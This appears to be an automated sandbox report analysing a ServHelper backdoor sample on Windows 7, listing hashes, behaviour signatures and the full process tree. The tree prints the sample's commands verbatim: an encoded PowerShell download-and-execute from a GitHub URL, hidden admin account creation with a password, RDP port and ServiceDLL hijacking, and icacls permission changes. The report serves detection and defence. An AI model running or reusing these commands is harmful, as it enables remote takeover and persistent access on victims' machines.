Analysis
-
max time kernel
140s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
10-04-2024 14:27
Static task
static1
Behavioral task
behavioral1
Sample
da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605.exe
Resource
win10v2004-20240226-en
General
-
Target
da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605.exe
-
Size
5.7MB
-
MD5
61d5e32562d1c70daf0a3112f7888258
-
SHA1
11c54ce99e87637f58c7bc0bd8134c73df9bf879
-
SHA256
da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605
-
SHA512
9cad97c4c71535a2391ad73d13e27748300e3147a3383d4eee85caadb461815f9ee8e9b172e732df16813fa8f5ffdc7115e2740778ebc51c536ab06fc7910cc2
-
SSDEEP
49152:wDK8merb/T/vO90dL3BmAFd4A64nsfJdo5GQ5shfTuU92flI7MhhaftEhamnybrN:wD+3eGLmAQQQQQQQQQQQQQ
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 2436 powershell.exe 6 2436 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 2316 icacls.exe 1976 takeown.exe 2080 icacls.exe 2268 icacls.exe 1668 icacls.exe 2020 icacls.exe 1664 icacls.exe 2332 icacls.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 1748 1748 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1664 icacls.exe 2332 icacls.exe 2316 icacls.exe 1976 takeown.exe 2080 icacls.exe 2268 icacls.exe 1668 icacls.exe 2020 icacls.exe -
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 4 raw.githubusercontent.com 5 raw.githubusercontent.com 6 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 9 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MKEMTASMMOHCBLG5JULA.temp powershell.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exepowershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 900efb55538bda01 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2608 powershell.exe 356 powershell.exe 3008 powershell.exe 1648 powershell.exe 2608 powershell.exe 2608 powershell.exe 2608 powershell.exe 2436 powershell.exe -
Suspicious behavior: LoadsDriver 6 IoCs
Processes:
pid process 484 1748 1748 1748 1748 1748 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 2608 powershell.exe Token: SeDebugPrivilege 356 powershell.exe Token: SeDebugPrivilege 3008 powershell.exe Token: SeDebugPrivilege 1648 powershell.exe Token: SeRestorePrivilege 2268 icacls.exe Token: SeAssignPrimaryTokenPrivilege 2496 WMIC.exe Token: SeIncreaseQuotaPrivilege 2496 WMIC.exe Token: SeAuditPrivilege 2496 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2496 WMIC.exe Token: SeIncreaseQuotaPrivilege 2496 WMIC.exe Token: SeAuditPrivilege 2496 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2632 WMIC.exe Token: SeIncreaseQuotaPrivilege 2632 WMIC.exe Token: SeAuditPrivilege 2632 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2632 WMIC.exe Token: SeIncreaseQuotaPrivilege 2632 WMIC.exe Token: SeAuditPrivilege 2632 WMIC.exe Token: SeDebugPrivilege 2436 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 2188 wrote to memory of 2608 2188 da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605.exe powershell.exe PID 2188 wrote to memory of 2608 2188 da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605.exe powershell.exe PID 2188 wrote to memory of 2608 2188 da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605.exe powershell.exe PID 2608 wrote to memory of 2692 2608 powershell.exe csc.exe PID 2608 wrote to memory of 2692 2608 powershell.exe csc.exe PID 2608 wrote to memory of 2692 2608 powershell.exe csc.exe PID 2692 wrote to memory of 2412 2692 csc.exe cvtres.exe PID 2692 wrote to memory of 2412 2692 csc.exe cvtres.exe PID 2692 wrote to memory of 2412 2692 csc.exe cvtres.exe PID 2608 wrote to memory of 356 2608 powershell.exe powershell.exe PID 2608 wrote to memory of 356 2608 powershell.exe powershell.exe PID 2608 wrote to memory of 356 2608 powershell.exe powershell.exe PID 2608 wrote to memory of 3008 2608 powershell.exe powershell.exe PID 2608 wrote to memory of 3008 2608 powershell.exe powershell.exe PID 2608 wrote to memory of 3008 2608 powershell.exe powershell.exe PID 2608 wrote to memory of 1648 2608 powershell.exe powershell.exe PID 2608 wrote to memory of 1648 2608 powershell.exe powershell.exe PID 2608 wrote to memory of 1648 2608 powershell.exe powershell.exe PID 2608 wrote to memory of 1976 2608 powershell.exe takeown.exe PID 2608 wrote to memory of 1976 2608 powershell.exe takeown.exe PID 2608 wrote to memory of 1976 2608 powershell.exe takeown.exe PID 2608 wrote to memory of 2080 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 2080 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 2080 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 2268 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 2268 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 2268 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 1668 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 1668 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 1668 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 2020 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 2020 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 2020 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 1664 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 1664 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 1664 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 2332 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 2332 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 2332 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 2316 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 2316 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 2316 2608 powershell.exe icacls.exe PID 2608 wrote to memory of 1628 2608 powershell.exe reg.exe PID 2608 wrote to memory of 1628 2608 powershell.exe reg.exe PID 2608 wrote to memory of 1628 2608 powershell.exe reg.exe PID 2608 wrote to memory of 1036 2608 powershell.exe reg.exe PID 2608 wrote to memory of 1036 2608 powershell.exe reg.exe PID 2608 wrote to memory of 1036 2608 powershell.exe reg.exe PID 2608 wrote to memory of 2836 2608 powershell.exe reg.exe PID 2608 wrote to memory of 2836 2608 powershell.exe reg.exe PID 2608 wrote to memory of 2836 2608 powershell.exe reg.exe PID 2608 wrote to memory of 588 2608 powershell.exe net.exe PID 2608 wrote to memory of 588 2608 powershell.exe net.exe PID 2608 wrote to memory of 588 2608 powershell.exe net.exe PID 588 wrote to memory of 2880 588 net.exe net1.exe PID 588 wrote to memory of 2880 588 net.exe net1.exe PID 588 wrote to memory of 2880 588 net.exe net1.exe PID 2608 wrote to memory of 1712 2608 powershell.exe cmd.exe PID 2608 wrote to memory of 1712 2608 powershell.exe cmd.exe PID 2608 wrote to memory of 1712 2608 powershell.exe cmd.exe PID 1712 wrote to memory of 912 1712 cmd.exe cmd.exe PID 1712 wrote to memory of 912 1712 cmd.exe cmd.exe PID 1712 wrote to memory of 912 1712 cmd.exe cmd.exe PID 912 wrote to memory of 2284 912 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605.exe"C:\Users\Admin\AppData\Local\Temp\da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g5czikhi.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES22ED.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC22EC.tmp"4⤵PID:2412
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:356
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1976
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2080
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1668
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2020
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1664
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2332
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2316
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1628
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:1036
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2836
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2880
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:2284
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1988
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:3060
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:2908
-
C:\Windows\system32\net.exenet start TermService5⤵PID:452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1116
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1656
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2988
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:1300
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:1552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1212
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc xrufVHZW /add1⤵PID:964
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc xrufVHZW /add2⤵PID:304
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc xrufVHZW /add3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:1208
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:868
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" QGTQZTRE$ /ADD1⤵PID:2224
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" QGTQZTRE$ /ADD2⤵PID:1864
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QGTQZTRE$ /ADD3⤵PID:2180
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1908
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:1132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1144
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc xrufVHZW1⤵PID:1912
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc xrufVHZW2⤵PID:1584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc xrufVHZW3⤵PID:2852
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1560
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1728
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1968
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:2660
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b32f59df5d47052aa8e0fd1a45792211
SHA1d98266f4fc05d773a611dbf19734a5fa2d73eee2
SHA256e208a7c869f54ede63f7fe80b90d2f9bca568ced3c3e141a7ba215a6bdb3739f
SHA512023f9239dedb2249534301f873f25e8b12689847f661b4757f38166313c6231ec9de8953a32a062741683fde73a4fcf9f5d6553669b45a0a346c689b57996073
-
Filesize
3KB
MD5142686617c739cbd58ae63cd98401da8
SHA165f726f1b94c1b42ef091f8637f667396a25509b
SHA256eaa265f16438270cfe6ec1073bf1a9fdfc446e3c5301e2a3291d126319625ac2
SHA5127ea301f6d3105fcb1b6a3666dfa25b21a4c5947fcfbe68aaa8ee4746c18050fbc29f7f8b0060db4da04b3932eb6cc928c6b28612729f27a37876e29cb18c22be
-
Filesize
7KB
MD5a46e70bd3b06e2657aae77e15783e1e4
SHA1d3063b3c438af333a8046d99719c3ab23afe3a9a
SHA256c4d4d1820e2ca7036c994c21a76469b51b664a35b42386bbf908ac03f3759780
SHA512841150502b5f45b23332dbc0266cb43cd7f9e2b9997975661f71a81ae77bf89515ddaf62323db32c5ac4877bd7d4df2f7cbcf00c87c897f47b169590017a3276
-
Filesize
2.5MB
MD59fca6b1768eba2c5d42f189123152e32
SHA1560ec3249af6e8d82e994554475b870d32145352
SHA256c5c7012656bfebd5ba7d4ae8459bd2fcc57ac661e413e2b1da339b9fba86de1f
SHA512b72f2bc28dcde144596eabb62375479c4ddb3b004ac8759ee9523170289f55572784e695a552fd612a5dc5a56f6c76b3baee9831c7cac7123f72b2eb2aadb3f2
-
Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5197621e5351d0d31e7bcdccd84894aba
SHA144badcf024c21b6fb130b19d696a9d219e332c65
SHA256df10fed2ca8167b7b9348e61892aa13ef2c826537427dcf88ac36e7107f16842
SHA512f61abea8e7122693a8ee6bb36444d729061708dd4f31fe16ef727674cbd6c95a683f87b00328d86817fa829eae2a6238250d434e0fa4535ffd3f2642a185e8cd
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
652B
MD5830a4984660215b067b885ef543d287d
SHA1328ecc5580ae2c1f3648cd2d9fd572ff91e05d5f
SHA256519311baee2592d1f157ace8a5c93c649acc2ff32f9ba27e9b3ba9d7c414796e
SHA512bf5a24d1f5f1148dd342f299ef066f4d59e5d5635019418db0df1036df9da1095cb8b8e6fc7057286b86f6196b459317ae99e05de54baea4f5c0bb8bd100eb62
-
Filesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
Filesize
309B
MD5464e44141bc1a3eb01df2083abdd478d
SHA156f75619f2a377012cfe1616d70fda4e4e9e3718
SHA256c925a197017e96685797dc65c2cf29df7bbb3c56b29fe9f4974596d9b60f6767
SHA512f2d78dfad95166fef18151b9ba963461ba2934022eafdd8e7fe2d684af278af6024adf20dd218ee218d1fb0c41ec46a509081fdc4eed71a6883c072c47afd645
-
Filesize
60KB
MD50750828e5a80dae0280c43945332e145
SHA1fa1c85c33c0b99f8df14b6ccbd37f5df3d62c30c
SHA256637dd8f4245397e281bf84433f75eeb40461e70e81a11a4c2c252dc8f9e4b947
SHA512a45f4023f5d8951fef44bbe830c1b8992e7cb9c013882048d7227bac0c76869584c1ccc1d323803ced7a1e353998d0bface12eb9ef1dcd04e8e39b155528fd14
-
Filesize
743KB
MD50941efccfdbde6a619081456be071102
SHA14d9079f335bfdb4e88e022ffdd2193c4561f099d
SHA25699dbace98f5f29a5c0c962db270dc195a8b6d2f8dbb009b79b929ff9d68d8281
SHA512bbb587471dec6beae7852ae2ee1fff0efb26ce57ab69dbaf4385c965bf09a31be60c67951e52f488866daa0effab715e6b1a0aca5b02a7fdcc5dd586d84d56ab